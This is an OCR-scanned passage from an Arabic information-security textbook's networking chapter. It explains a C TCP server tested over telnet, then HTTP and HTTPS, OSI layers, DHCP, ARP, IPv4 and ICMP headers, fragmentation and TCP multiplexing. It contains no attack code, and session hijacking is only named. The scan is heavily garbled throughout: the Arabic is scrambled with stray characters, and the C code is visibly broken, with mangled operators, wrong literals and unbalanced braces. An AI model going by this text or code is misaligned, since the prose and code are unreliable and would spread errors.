دعنا نلق نظرة على هذه ال :function‏ 


setsockopt(sockfd, SOL SOCKET, SO REUSEADDR, &yes, sizeof(int)) -- -1) 
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إا تستقبل p yO Arguments ie‏ بتوضيحهم: 
* الأول هو ال cami Socket‏ وهذا منظقي اء سنعطیها ال fd‏ الخاص مذا ال „socket‏ 
" ال argument‏ الثانية وضعت لتحدید نوع ال (to set the level of the option) option‏ 
۶ ال Argument‏ الثالثة:" "specifies the option itself‏ وهی ال REUSEADDR‏ حيث نعنی ما مایل: 


“Let the socket bind to a port, even if that port is in use!” 


لأنه أحياناً عند ماوّلة فتح port‏ مُعَيّن لا تجده متاح!» > AM‏ زبا يكون م مُستخدّم من قبل أي TES service‏ 
e EZ‏ هنا بإجباره على استخدام هذا ال port‏ 
* آما الرابعة والخامسة فهم pointer‏ لل data‏ الخاصة «option JL‏ وال length‏ الخاص ما وهو bytes‏ 4. 


."32-bit integer for its value” تستخدم‎ SO REUSEADDR لأن ال‎ integer و هم من نوع‎ 


والآن سنمضي للجزء الخاص بال objects‏ التي اشتققناها من ال struct sockaddr in‏ لنتحدث عنهم قليلا. 
سنقوم بعمل إعدادات ال |S (host. addr structure)‏ يظهر في الكود بالصفحة التالية: 
TEL‏ السطر الأول حددنا address family: IPv4 JI‏ 
* وني السطر الثاني ال port‏ وهو 6900 لاحظ استخدام ال function‏ التي s‏ ستحوله من ال host‏ إلى ال 


.16 bits أي‎ «short من نوع‎ "network byte order" 


A 5‏ ی 


* ثم في السطر الثالث قلنا له ob‏ يأخذ ال IP Address‏ الحالي الخاص ig‏ الجهاز. 
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2 
ae 


خيرا في السطر الرابع سَنقوم باکال باقي ال Address Structure‏ وهم bytes‏ 28 سیتم G‏ بال 


S padding‏ أوضحنا سابقاً. 


host addr.sin family - AF INET; //Host byte order 

host addr.sin port - htons(PORT); //Short, network byte order 

host addr.sin addr.s addr - O0; // Automatically fill with my IP. 
memset(&(host addr.sin zero), 'NO', 8); //Zerothe rest of the struct. 


"bind( )" إلى ال‎ ob 2 


if (bind(sockfd, (struct sockaddr *)&host addr, sizeof(struct 
Sockaddr)) == -1) 
fatal("binding to socket"); 


وتقوم بالاتي: 
It is used on the server side, and associates a socket with a socket address structure, a specified‏ 
local port number (in our case 6900), and IP address.‏ 


: bls Arguments مجموعة من ال‎ function هذه ال‎ iet 
socket JL اص‎ file descriptor لها ال‎ FEL 
له إلى ال‎ typecasting Jem لاحظ أننا قمنا‎ «address structure الثانية وهی ال‎ Argument ال‎ e " 
عنلما‎ IPv4 address structure ال‎ Xs المثال الذي ضر بناه‎ "s .. "general address structure" 
"Generic structure" أسقطناه على ال‎ 
"the length of the address structure ” الثالثة وهی‎ Argument ال‎ 3 " 


Networhing 
[143] 


gU 3‏ بعدها ) listen(‏ لتقو م c^‏ ال incoming connections‏ في ‘backlog queue‏ أي Cals‏ بعضهم بشكل 
متتابع» وقد تم تحديد الحد الأقصى لل "connections"‏ التى تستقبلها ب 5 


if (listen(sockfd, 5) == -1) 
fatal("listening on socket"); 


g 
we ا‎ 


connections هذه ال‎ J p accept( ) تقوم ال‎ 


والآن جاء دور آخر function‏ وهي التي سَتستقبل ال LS connections‏ بالكود بالأسفل: 
ثلاحظ هذا الشر ط: (1) while‏ .فالعدد 1 هنا يَعنى True‏ 


واستَخدمنا fd‏ جدیده» هل SC SOE‏ 
ستبداً ال ( accept(‏ عملها» فهی تشبه ال ( )9100 إلا Lil‏ سنستبدل ال IP address‏ الخاص بال Server‏ 


client JL الخاص‎ IP Address بال‎ 


So.. the return from accept( ) function is new file descriptor "new sockfd" for the accepted 
connection. As follows: 


while(1) { 
sin size = sizeof(struct sockaddr in); 
new sockfd - accept(sockfd, (struct sockaddr *)&client addr, 
&sin size); 


if(new sockfd -- -1) 
fatal("accepting connection"); 


«‘"ASCI dotted notation" بصيغة ال‎ client JL الخاص‎ IP Address ال‎ tj لتطبع‎ J printf( ) سنستخدم دالة‎ Is 
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متبوعاً بال port number‏ الخاص |S -client JL‏ يل: 


printf("server: got connection from 55 port %d\n", 
inet ntoa(client addr.sin addr), 
ntohs(client addr.sin port)); 


£ 
- * 


دم تاي ( «send(‏ وهی ننتمی هذه العائلة: 


send() and recv(), Or write() and read(), Or sendto() and recvfrom(), 
They are used for sending and receiving data to/from a remote socket. 


سيقوم ال Server‏ بإرسال string‏ إلى ال client‏ فور نجاح ال «connection‏ مكونة من |S 13 bytes‏ يظهر بالأسفل» 


آخر ois argument‏ ال function‏ هو ال 5 قمنا بوضع epe‏ 


send(new sockrd, "Hello, serverin", 13, 0); 


receive( ( دور ال‎ gi e 


لتستقبل ال strings‏ من ال client‏ حيث تستقبل أكثر من «Arguments‏ منها ال .buffer‏ 


هل 5x‏ هذا ال “buffer‏ 
لقد عرّفناه في بداية البرنامج» وحددنا حجمة ۰1024 هذا ال Buffer‏ 553 عن الآتي: 
“The maximum length to read from the socket"‏ 


وآخر Argument‏ تستقبله خاص بال flags‏ وكالعادة وَضَعنا به (0). 
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integer 4e 559 .recv length انتهائهاء وهو‎ x tÍ return بارجاع‎ function تقوم هذه ال‎ 


recv length < recv(new sockfd, &buffer, 1024, 0); 


:Loop دور ال‎ gi 5 


تقوم بطباعة ما بداخل هذا ال recv length‏ وهو عدد ال AS lI bytes‏ 


while(recv length > 0) { 
printf ("RECV: 50 bytes \n"; recv length); 


Gy‏ الختام Gk‏ دور ال dump()‏ التي شر حناها مسبقاً.. 


فتستقبل هذه ال :Arguments‏ 


dump (buffer, recv length) 
على الیّمین.‎ printable data على الیسار وال‎ Hex ال‎ ina data كي يتسنى لها عرض ال‎ 


while(recv length » 0( ( 
printf ("RECV: 50 bytes\n", recov length); 
dump (buffer, recv length); 
recv length = recv (new sockfd, &buffer, 1024, 0); 


) 


close(new sockfd); 


) 


return 0; 


) 


لقد وصلنا إلى نهاية شرح هذا الکود» والان Slee‏ دور التجربة. 
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o‏ هذا الكود.. 


root@server:~/booksre $ gcc server.c 
root@server:~/booksre $ ./a.out 


سنقوم uu‏ الإتصال من جهاز آخر بهذا ال «server‏ نستخدم ال telnet‏ للاتصال من ال |S -client‏ نشاهد.. ean‏ 
الا تصال!» du‏ السيرفر بإرسال string‏ ..هى tle a “Hello, server"‏ دورنا نحن» ال «client‏ فأرسلنا له عبارة 


.dump( ) في ال‎ cx b oj أحرّف عشوائية‎ bes «this is test” 


root@client:~ $ telnet 192.168.18.128 6900 
Trying 192.168.18.128... 
Connected to 192.168.18.128. 


Escape character is '^]'. 
Hello, server 
this is a test 
fjsghau;ehg;ihskjfhasdkfjhaskjvhfdkjhvbkjgf 


هيا dus‏ معا ما à eod‏ طَرّف ال :Server‏ 
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root@server:~/booksre $ ./a.out 

server: got connection from 192.168.18.131 port 56971 

RECV: 16 bytes 

74 68 69 73 20 69 73 20 61 20 74 65 73 74 Od Oa | This is a test... 
RECV: 45 bytes 

66 6a 73 67 68 61 75 3b 65 68 67 3b 69 68 73 6b | fjsghau;ehg;ihsk 
6a 66 68 61 73 64 6b 66 6a 68 61 73 6b 6a 76 68 | jfhasdkfjhaskjvh 
66 64 6b 6a 68 76 62 6b 6a 67 66 Od Oa | fdkjhvbkjgf... 


2 


إلى هنا تکون 2$ وصّلنا إلى نهايّة هذا المثال. 
سننتقل للحديث عن بعض المفاهيم المتعلقة بال ."OSI Layers"‏ 


The Browser 


عندما نقوم ms‏ الإنترنت باستخدام أي متصفح (browser)‏ باستثناء ال lig .. “Internet Explorer”‏ يعني 
أننا نقع à‏ آعل OSI Layers Jl‏ وهي ال on «Application Layer‏ نتعامل مع »55 کول كال ‘HTTP‏ 
وهو من البروتوكولات المستخدمة في عملية التواصل بين ال browser‏ و ال web servers‏ المختلفة» فهو يقوم بعمل 
request‏ للصفحة التي تريدها أنت من ال «web server‏ الذي بدوره Ja;‏ ال connections‏ من ال 5 وهي 
ال (Clients)‏ على ال 80 port‏ 

سنتوقف قليلاً عند ال ..Ports‏ عندما نتصل نحن باستخدام iail‏ فيكون ال port‏ الخاص “Local Port” Ly‏ تمل 
رقم عشوائي أعلى من ۰1023 وينتظر ال Server‏ ال Connection‏ ف على ال Port‏ الخاص به هو.. ورقمه )80( 


ا “Remote Port”‏ بالنسبة لنا. 


Networhing 
[148] 


وإذا ts‏ نحن ال ..Server‏ سيكون ال "Local Port"‏ هو )80( 5,555 ال “Remote Port"‏ هو 1024. 


eH! protocol version JL a الخاص بالصفحة»‎ E متبوع‎ Get مد‎ i Di request المهم..هذا ال‎ 


بال e .HTTP‏ یقوم ال server‏ بعمّل respond‏ لك content JU‏ التى (dis‏ پسبقها تعض ال «Headers‏ عبارة عن 


بعض العلومات الخاصة Server JL‏ .. 


تأمل معی هّذا المثال: 
قمنا باستخدام الأمر Get TRE Head‏ لأننا ir‏ فقط من ال Server‏ أن deus‏ نا ال Headers‏ الخاصة du es‏ 


تحميل الصفحة الآن!. 


reader@hacking:~/booksre $ telnet www.internic.net 80 
Trying 208.77.188.101... 

Connected to www.internic.net. 

Escape character is ۰۶ 

HEAD / HTTP/1.0 

HTTP/1.1 200 OK 

Date: Fri, 14 Sep 2007 05:34:14 GMT 
Server: Apache/2.0.52 (CentOS) 
Accept-Ranges: bytes 

Content-Length: 6743 

Connection: close 

Content-Type: text/html; charset-UTF-8 


Connection closed by foreign host. 
reader@hacking:~/booksre $ 


"hosted on web server called Apache" à نا أن هذا المو‎ ga كما نرى فهو‎ 
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ونوع نظام التشغيل هو CentOS‏ وهي توزيعة من توزيعات „Linux‏ 

هذا ال (HTTP)‏ لا پستخلم في ال sessions‏ مثل ال Logins‏ أو ال E-payment‏ أو أي e session‏ بل پستخدم 
ال (HTTPS)‏ لذلك!» ویعنی «HTTP over SSL or over TLS”‏ أو “HTTP Secure”‏ الفرق هنا LÍ‏ في هذا 
النوع من ال 5 سنقوم بتشفير البيانات المارة بين ال browser‏ و ال Web Server‏ أو ال Mail Server‏ على 
سبیل الثال» باستخدام بروتوکول ال SSL‏ أو ال TLS‏ سنتعرض في الباب الرابع لبروتوکول ال SSL‏ بمزید من 


التفصیل. 


تقوم بعض الواقع بتفعیل ال HTTPS‏ في آول Session‏ وهي ال Login‏ ثم تعود لتتعامل بال HTTP‏ مرةً أخرى 
باعتبار أن ال Sessions‏ التي تلیها ليست ols‏ أهمية بقدر ال Login‏ فانتشر نوع من اشجات ندرج تحت ال 
AES ob Session Hijacking‏ آحخدهم لتنتهي من ال jaa) gi a Secured Login‏ على ال Sessions‏ التي تلیها 
کیت fey‏ حینها بروتوکول ال HTTP‏ الغير dosi‏ فمثلاً إذا کنت JRF‏ الدخول فى مدق فسینتظر عملية 
تسجيل الدخول» de eS‏ ال ZŠ "Session Riding"‏ حينها PLII‏ بال Account‏ الخاص بك. 

تقوم Google‏ على سبيل JE‏ بتفعيل HTTPS‏ على جنيع خدماتها بدءاً بتسجيلك للدخول وحتى تسجيل خروجك. 
يوجد العديد من المصادر التي sus‏ الأمور المتعلّقة بالمتصمّحات وأساليب BAI‏ من LSA‏ الواقعة عليها مثل ال 


5 وغيرها.. 
قمنا بالتعرض لأنواع هجات ال XSS‏ بشیء من التفصيل في ال Appendix‏ الموجودة في آخر الکتاب» يمكنك 
مراجعتها. 
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The Big Picture 


لا يخلو أي منزل OW‏ من أي Kez device‏ لصاحبه من دخول الإنترنت!» فالانترنت أصبح شيء أساسي ceto‏ في 
حياتناء فمن o‏ غير من للسيد الحرم «I "Google"‏ فقد آخدت gajab WS‏ حياتنا!. 

„OSI Layers يجري داخل ال‎ U بالحديث عن شبکات امحاسب. فسنقوم بإجراء مُراجعة سّريعة‎ age أننا‎ os 
«App Layer وهي ال‎ Layer 7 تتعامل مع ال‎ OV آنت‎ «browser تفس لاتوت باستخدام ال‎ uod لنفرض آنك‎ 
تتجول داخل ال‎ G5 أو‎ cles POPS مع ال‎ SMTP ربا تتفقد بريدك الإلکتروني» فتستخدم حینها بروتوکول ال‎ 
أو ربا تقوم‎ HTTPS بحسابك الشخصی. فتکون حینها تستمتع بالتصفح الامن باستخدام بروتوکول ال‎ Google+ 
...الخ.‎ FTP لبعض اللفات لأحد الواقع فتکون حینها تستخدم بروتوکول ال‎ Upload بعمل‎ 


هذه الأمور كي تحدث لابد من فتح Sockets‏ مع ال «end points‏ يتم ذلك في ال Session Layer‏ فهي المسؤولة عن 
توفير ال interface‏ ل أو تستقبل ع‌ها ال ois .data‏ ال interface‏ أو ال Socket‏ سَتحتاج ol‏ تعتمد على 
بروتوكول لتوصيل ال code data‏ أليس كذلك؟ 

هذا البروتوكول سیکون اما TCP‏ أو ‘UDP‏ وکلاهم e‏ في ال Transport Layer‏ ما الطبقة التي E‏ 
ال Session Layer‏ .. 

ولكن لكي oS‏ هذا ال alas TCP‏ فسیحتاج إيصال ال Data‏ إلى ال Destination‏ مُعتيداً بذلك de‏ 


.Network Layer وهى ال‎ «Layer 3 ال‎ 
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والآن لتفرض ol‏ هذه ال "Destination End Point"‏ عبارة عن جهاز يقع في شبكة e‏ 

«LAN (Local Area Network)‏ بالطبع سيكون بها peas router‏ ك Switch Gateway‏ يربط الأجهزة بالشبكة» 
جید.. ore‏ إيصال هذه ال packet‏ لهذا cl AI‏ وهو متصل Switch JL‏ عن طريق ال network cable‏ 

عندما تصل ال packet‏ إلى ال router‏ وتذهب إلى ال switch‏ ستنتهي حينها dogs‏ ال 3 «Layer‏ وتبداً مهمة ال 
Layer 2‏ وهي ال «Data-Link Layer‏ ستقوم هذه الطبقة بایصال ال “frame”‏ إلى هذا اهاز باستخدام ال Link‏ 
Layer Protocols‏ » وينقل cable JI‏ هذا ال frame‏ على Jes X bits and bytes iz»‏ ال (Physical Layer)‏ 
«Layer 1‏ هذا ما يسمّى MC al e (S “Service Block" JL‏ وهو اعتادية كل طبقة على الأخرى لتكتمل 


عملية ال Communications‏ بين الأنظمة. 


سنقوم بتسليط الضوء SUB‏ على كل من )4 (Layer 2, 3, and‏ لأهميتهم في المرحلة القادمة. إذا كانت لديك معرفة لا 
بأس ما بال OSI Model‏ 3 تجاوز الثلاث فقرات القادمة. 


Layer 2 (Data-Link) 
والآن سنآخذها بشيء من‎ OSI Model نُوضح ال‎ US ias في بداية هذا الفصل‎ Layer قد تكلمنا عن هذه ال‎ US 


التفصيل. کا آشر نا سابقاً Ob‏ برتوكول ال Ethernet‏ يتواجد في هذه الطبقة فا هى وظیفته؟ 
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device وهو كارت الشبکت هذا ال‎ NIC جهاز يريد أن يدخل إلى الشبكة فلابد أن يمتلك‎ GV 
أو ال‎ Physical Address حينها سيمتلك عنوان خاص به» لا يتشابه مع أي عنوان آخرء يطلق عليه‎ 
.Hex يظهر بصيغة ال‎ 6 bytes من‎ address يتكون هذا ال‎ «MAC (Media Access Control) 


del 


XXIXXIXXIXXIXXIXX 


تقوم ال Data-Link Layer‏ بتوصيل ال frames‏ من جهاز إلى آخر داخل نفس ال Broadcast Domain‏ 


ولكن ماذا إن أراد أحد الأجهزة داخل الشبكة إرسال packet‏ إلى جهاز يقع خارج الشبكة؟ 
دعنى في البداية أتحدث معك عن بعض الأساسيات المتعلقة بكيفية حصول جهاز ما في الشبكة على ال 1۳ الخاص به 
عن طريق ال DHCP Server‏ ووظيفة بروتوكول ال ARP‏ في هذه العملية. سنقوم بتوصيل جهاز بالشبكة حيث 


..DHCP Server يوجد ما‎ 


لنشاهد كيف سيتلقى هذا الجهاز ال 1۳ الخاص به. فهذا اهاز لا يمتلك IP‏ بعد!ء هو فقط يمتلك „MAC‏ 


Optaining an address 
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Understanding Hacking and Information Security القرصنة الإلكترونية وأحن المعلوماءه‎ 


DHCP server: Arriving client . 5‏ 
يقوم الجهاز بارسال Broadcast‏ 223.1.2.5 
داخل الشبكة حيث يكون ال 

Source port: 68 

DHCP discover : Destination port: 67 


src: 0.0.0.0, 68 
:255.255.255.255,67 : "P 

bU, "=‏ هذا ال 67 E : *Port‏ و 

yiaddr: 0.0.0.0 

transaction ID: 654 DHCP offer 


src: 223.1.2.5, 67 
dest: 255.255.255.255,68 
DHCPOFFER | 
yiaddrr: 223.1.2.4 
transaction ID: 654 
DHCP server ID: 223.1.2.5 
DHCP request Lifetime: 3600 secs . . 
src: 0.0.0.0, 68 لهذا الجهاز.‎ 
dest: 255.255.255.255, 67 
DHCPREQUEST 
yiaddrr: 223.1.2.4 
transaction ID: 655 ° . 
DHCP server ID: 223.1.2.5 وماذا بعد استلام ال 12 من‎ * 
Lifetime: 3600 secs 
DHCP ACK 


src: 223.1.2.5, 67 
dest: 255.255.255.255,68 
DHCPACK 

yiaddrr: 223.1.2.4 
transaction ID: 655 

DHCP server ID: 223.1.2.5 
Lifetime: 3600 secs 


oy‏ ال DHCP Server‏ يستقبل 


ال connections‏ عليه!. فیقوم ال 


DHCP‏ بإرسال ال IP‏ المقترح 


ال Server‏ 
بعد أن يستلم الجهاز ال 1۳ LAH‏ 
من ال DHCP‏ فلن يستخدمه على 
الفور!ء سيقوم بالتأكد أولاً من أنه 
غير مُعطى لأي جهاز آخر على 
الشبکت حینها hu‏ ينا Jagen‏ 
(Gratuitous ARP) Packet‏ للأجهزة في 


Time Source: Ref (2) Time 
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الشبكة بأنه يريد استخدام هذا ال ۰1۳ فان كان أحد الأجهزة يمتلك هذا ال IP‏ بالفعل! فسيقوم بإرسال 
already in use" ARP packet‏ "* حينها سيقوم هذا الجهاز بمحادثة ال fa DHCP Server‏ أخرى ليطلب منه 


IP‏ ختلف. وهكذا حتى يثبّت الأمر. 


یظهر في الشکل ال ARP Packet‏ ۱ 
am pyp memes‏ 
پرسلها اهاز إلى الشبكة ليتاكد من - 


سلامة ال IP‏ امحدید. 


DHCP DISCOVER 


DHCP OFFER 


ARP Messages 
DHCP REQUEST 


والآن.. سنتکلم عن نوعين من ال 


ARP messages‏ وهم: 


DHCP ACC 


ARP Gratuitous “ARP request and reply” 


هذا ال ARP request or reply‏ 
يسير في الشبكة مثله مثل بقية ال 
frames‏ 


فكيف لنا أن نُصيفة عن بقية ال frames‏ الأخرى؟. 
نعم.. يقع à‏ ال Header‏ لهذا ال frame‏ أو ال Ethernet‏ خانة تعبر عن نوع هذا ال Ethernet‏ ما إذا كان ARP-type‏ 


أو IP-packet‏ ستأتي «J|‏ بمزيد من التفصيل لاحقاً في الباب الثالث. 


Networhing 
[155] 


Understanding Hacking and Information Security القرصنة الإلكترونية وأمن المعلومارند‎ 


| am! 
And here's my MAC 


address 
~ 08-00-27-E4-5C-3F 


Pi ARP request 
p ARP reply 


الشكل يوضح ال «ARP request and reply‏ يبدو أن Y PCI‏ يمتلك ال MAC‏ المقابل لل 192.168.100.102 IP‏ 


في ال cla ARP Cache‏ وبالتالي لن يستطيع الا تصال cu‏ فيقوم بإرسال ARP Request‏ إلى ال switch‏ ليستعلم 
عن هذا ال «MAC‏ يستقبل ال Switch‏ هذا ال ARP request‏ ويقوم بعمل flood‏ له من جميع ال ports‏ باستثناء ال 
port‏ الذي أتى منه هذا ال request‏ هنا سيهمل جميع الأجهزة هذه الرسالة باستثناء الجهاز الذي يحمل هذا ال 1۳ 
192.168.100.102 فیقوم بالرد مُرسلاً ARP reply msg‏ إلى ال switch‏ الذي يقوم بدوره بربط هذا ال MAC‏ 
الجديد بال port‏ الذي جاء منه هذا ال «reply‏ ثم BL ob est‏ إلى الجهاز الذي طلب هذا ال «MAC‏ هذا الجهاز 
(PCI)‏ لديه ARP Cache‏ يضع بها عناوين الأجهزة التي معه في الشبكة وال MAC Addresses‏ المناظرة ها. فيقوم 


بعمل Update‏ لهذا ال table‏ لديه. 
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Understanding Hacking and Information Security aslagleall aly القرصنة الإلكترونية‎ 
Sending Packet outside domain 


نأتي إلى السؤال الذي طرحناه في البداية!.. ماذا إن أراد أحد الأجهزة إرسال packet‏ لوجهة ما خارج Subnet JI‏ ؟؟. 


192.168.1.254/24 192.168.2.254/24 


—— — 
p ت‎ 

e P d P d 

E08 


IP 192.168.1.1 IP 192.168.1.2 IP 192.168.2.1 IP 192.168.2.2 
DG 192.168.1.254 DG 192.168.1.254 DG 192.168.2.254 DG 192.168.2.254 
00-16-76-00-00-01 00-16-76-00-00-02 00-16-76-00-00-03 00-16-76-00-00-04 


عندما يرغب PCI‏ بإرسال packet‏ إلى 203 فإنه لن يرسل ARP Request‏ ليستعلم عن ال MAC‏ الخاص cw‏ 
لأنه يعلم of‏ هذا ال PC‏ يعد esi unreachable‏ عوضاً عن ذلك باستخدام ال ARP‏ لعمل MAP‏ لل 
(Gateway IP: 192.168.1.254)‏ إلى ال MAC‏ القابل له ۰00-00-00-00-01 ویتعامل على آنه هو ال Distination‏ 
MAC‏ مع الابقاء على ال )192.168.2.1 (Dist. IP:‏ وهو عنوان .PC3‏ وعندما يصل ال frame‏ إلى ال router‏ یقوم 
بتسليمه إلى ال Network Layer‏ حيث يتم إزالة ال es MAC‏ والبحث في ال forwarding table‏ لدی ال router‏ 


عن ال interface‏ التى ینتمی إليها هذا ال IP‏ الخاص بالجهاز 3 ویستخدم ال router‏ » » 5 کول ال Lal ARP‏ 
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لعمل MAP‏ لهذا ال 1۳ إلى ال MAC‏ المقابل له ثم يرسل ال packet‏ إلى ال switch‏ الذي يقوم بدوره بالبحث في ال 


-port من هذا ال‎ frame الخاص بال 3 ثم يرسل ال‎ MAC المقابل لل‎ Port لديه عن ال‎ CAM table 


Layer 3 (Network) 


هذه الطقة الت تقد UJ‏ خدمات ال Addressing and Delivery‏ رخ cale‏ تحدثنا use‏ ف بدابة هذا اللات Cul‏ 
بقه التي نفدم ee f g y‏ باينا قلي 


لكننا بحاجة SU‏ بعض الخصائص الْتعلقة بها لجاجتنا ها في الباب القادم. 


ماذا يعني مصطلح TCP/IP‏ ؟. al‏ يختصر هذه العبارة: 

“The use of Transmission Control Protocols (at Layer 4) over Internet Protocols (at Layer 3)" 

تكلمنا عن ال Header‏ الذي تقوم 302b‏ كل طبقة إلى ال Packet‏ وهو عبارة عن التفاصيل الخاصة ede‏ ال 
.Packet‏ 

سنتكلم قلیلاً عن هذا ال ..IP Header‏ 


IP Header 


هذا الشكل يوضح ال .JIPv4 Header‏ وتبلغ مساحته bytes‏ 20 بدون ال Options‏ 
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Bit 0 Bit 15 Bit 16 Bit 31 
Header Priority & Type 


Version (4) Length (4) of Service (8) Total Length (16) 
Identification (16) ios Fragment Offset (13) 
Time To Live (8) Protocol (8) Header Checksum (16) 
20 
Source IP Address (32) Bytes 


Destination IP Address (32) | 
IP Options (0 Or 32 If Any) 
Data (Varies If Any) 


كما تری.. Field YS‏ يُشير إلى co ees‏ سنوضح لك بعضاً منها: 


Version: These 4 bits specify the IP protocol version of the datagram, here it is IPv4. 


Total Length: This is the total length of the IP datagram (header plus data), 
measured in bytes. 


Identifier, flags, fragmentation offset: These three fields have to do with so-called 
IP fragmentation " "سنتکلم عن هذه الخاصية بعد قلیل‎ 


Time-to-live: to ensure that datagrams do not circulate forever, this field is decremented by one 
each time the datagram is processed 
by a router. If the TTL field reaches 0, the datagram must be dropped. 


Protocol: indicates the specific transport-layer protocol, For example, a 
value of 6 indicates that the data portion is passed to TCP, while a value of 17 
indicates that the data is passed to UDP. 
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وبا مناسبة» ال Less Reliable éd IP‏ في عملية التوصيل حيث لا يضمن لك بالضبط وصول ال Packet‏ إلى ال 
0 ولذلك ظهرت فائدة ال ICMP‏ نستخدم ال e ICMP Packets‏ عن آي خلل يحدث أثناء عملية 
الارسال أو الاستقبال لاحظ أنه في ال Field‏ الخاص بال Protocol‏ سيتم تحديد نوع ال «Packet‏ فمثلاً لو كانت 
ICMP msg‏ سيحوي هذا ال field‏ رقم 1 حيث يعبر عن بروتوكول ال ICMP‏ 

پستخدم ال ICMP‏ بشکل آساسي بين ال Hosts‏ لعمل kè Test Connectivity‏ بینهم» ونستخدم نوعين شهیرین 
من ال ICMP Packets‏ هم ال Echo Request‏ و Echo Reply‏ 

نقوم بتنفيذ هذا ال request‏ و reply‏ باستخدام برنامج صغير “Ping” (jaw‏ سأعرض لك بعض ال messages‏ 


الشافعة الظهور هدا البروتوکول: 


Type Code Description 
0 — Echo Reply 0 Echo reply (used to ping) 
0 Destination network unreachable 
1 Destination host unreachable 
3 — Destination 2 Destination protocol unreachable 
Unreachable 3 Destination port unreachable 
4 Fragmentation required, and DF flag set 
5 Source route failed 
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Understanding Hacking and Information Security المعلوماءه‎ galg القرصنة الإلكترونية‎ 


وهذا مثال بسيط يوضح ال 3 :ICMP msg type‏ 


Frame 8: 102 bytes on wire (816 bits), 102 bytes captured (816 bits) on interface 0 
Ethernet II, Src: CiscoInc 8b:36:d1 (00:1d:a1:8b:36:d1), Dst: Vmware 8e:37:ea (00:50:56:8e:37:ea) 
Internet Protocol Version و4‎ 5۳6: 192.168.3.1, Dst: 192.168.1.2 
0100 .... - Version: 4 
. 0101 - Header Length: 20 bytes 
> Differentiated Services Field: 0x00 (DSCP: CSO, ECN: Not-ECT) 
Total Length: 88 
Identification: @x@9a2 (2466) 
^ Flags: exee 
Fragment offset: @ 
Time to live: 125 
Protocol: ICMP (1) 
> Header checksum: @xaeaf [validation disabled] 
Source: 192.168.3.1 
Destination: 192.168.1.2 
[Source GeoIP: Unknown] 
Destination GeoIP: Unknown 


Type: 3 (Destination unreachable) 
Code: 3 (Port unreachable) 

~ Checksum: 0x828a [correct] 
Unused: 00000000 


» Data (32 bytes) from www.networklessons.com 


IP Fragmentation 


ال MTU‏ هي ال "Maximum Transmission Unit"‏ 508 تعني as‏ حجم لل Packet‏ المسموح ها بالإنتقال بين 


.Hosts ال‎ 


The maximum transmission unit (MTU) is the size of the largest network layer protocol data 
unit that can be communicated in a single network transaction. 
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Understanding Hacking and Information Security المعلوماءه‎ yaly القرصنة الإلكترونية‎ 


ويتم تحديد أقصى حجم مسموح به لاعتبارات code‏ منها تفادي حدوث أي ع أثناء الإنتقال» فال packet‏ ذات 


الحجم الكبير تستغرق وقتاً أطول للوصول إلى وجهتهاء وربا تُصيب ال Link‏ بالإجهاد eats‏ بطيئاً نسبیا. 


ولكن ماذا إن أردنا إرسال Packet‏ كبيرة الحجم؟. 

في هذه الحالة سنقوم بعمل oid Fragment‏ ال Packet‏ .. بمعنى أننا سنقوم بتقطيعها إلى قطع صغيرة ثم ترسلهم 
deu‏ وعندما يصلوا إلى ال Destination‏ سيتم إعادة جمیعهم مر 
الشكا التالي یوضح هذه العملية: 


۰:۲ 


آخری. 


Fragmentation: 
In: one large datagram (4,000 bytes) 
Out: 3 smaller datagrams 


Reassembly: 
In: 3 smaller datagrams 
Out: one large datagram (4,000 bytes) 
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قبل أن ننتقل بك إلى ال Transport Layer‏ > أن نذكرك ذه الملاحظة: 


Remember that the Internet's network-layer service (IP service) is unreliable. IP does not 
guarantee datagram delivery, does not guarantee in-order delivery of datagrams, and does 
not guarantee the integrity of the data in the datagrams. 


وهذا ما يفسر احتياجنا إلى ال UJ gl Transport Layer‏ هذه الخصائص التى لا LÍ Lig‏ ال .Network Layer‏ 


Layer 4 (Transport) 


سنتكلم عن بعض الفاهيم الجديده التي uad‏ هذه الطبقة» افترض معي أنك تجلس آمام جهازك وتتصفح أحد 
الواقع» وتقوم في نفس الوقت بتحميل ملف على الانترنت باستخدام برنامج ال FIP‏ وأيضاً تقوم بمحاولة اتصال 
بهذا الموقع باستخدام ال Telnet‏ كما تقوم بفتح اتصال آخر بموقع ختلف عبر ال Telnet‏ أيضاً. 

بهذا الشكل يكون لديك الآتي: 


Four application network processes running: 
An HTTP Process, FTP Process, and Two Telnet Processes. 


ربا تتسائل!» كيف تتم عملية تصنيف ال Data‏ القادمة من الانترنت وتوصيلها لكل Process‏ منهم على الرغم من 
تواجد إثنين منهم لنفس البرنامج "Telnet"‏ !؟ Ui]‏ وظيفة ال Transport Layer‏ حيث توفر لنا خدمة تُطلق عليها: 


5 


“Multiplexing & Demultiplexing’ 


Multiplexing & Demultiplexing 
من‎ Data بك (داخل جهازك) هذه ال‎ ioth Transport Layer هيا ليق ترتيب الأحداث» عندما تستقبل ال‎ 
التى تنتظرها.‎ Process إلى ال‎ Data فستقوم بتوصيل هذه ال‎ «Network الطبقة التى أسفل منها]ءا1.2‎ 
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يتم ذلك عن طريق فحص ال Segment Header‏ ليتم تحديد ال Socket‏ المناسبة oid‏ ال Data‏ ثم توجيه ال Data‏ 


لهذا ال «Socket‏ فيقوم هو بدوره بنقل ال Data‏ إلى ال Application Process‏ المناسبة. 


At the receiving End 
"DeMultipiexing" بال:‎ U المناسب‎ Socket إلى ال‎ "Transport Layer Segment" تطلق على عملية توصيل ال‎ 


At the sending Source 
وإجراء ال‎ Application Layer المختلفة من ال‎ Sockets القادِمّة من ال‎ data ال‎ e على عملية‎ all 


Network إلى ال‎ Us jl 4| Segment لتكوين ال‎ data على هذه ال‎ Header وضع ال‎ à Je Encapsulation 


“Multiplexing” : JU Layer 


Web Per-connection ۲ . . 95‏ 
كما ترى بالشكل تتم عملية ال Demultiplexing‏ في طرف server B HTTP‏ 
processes‏ 
هذا ال Web Server‏ بعد وصول ثلاثة Connections‏ من 


و Z‏ 
ثلاثة مستخدمين فيتم توجيه ال Data‏ المتعلقة user JS‏ ال ۰ Transport.‏ 
layer‏ 


demultiplexing بالش؟ )» ومن ثم إلى‎ p || La: ld (وهو‎ 3 A Socket 
user المخصصة لكل‎ Process ال‎ 


بالطبع عملية الت نیف هذه تتم بعد فحص ال Header‏ 


نوع هذه ال EN Segment‏ كيف سيتم التعامل مع ال 
.Data‏ 
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TCP Header 


Transport الخاص بطبقة ال‎ Header مايل ال‎ 
Bit 0 Bit 15 Bit 16 Bit 31 


3 
سس 


Checksum (16) Urgent (16) 
Options (0 or 32 If Any) 
Data (Varies) 


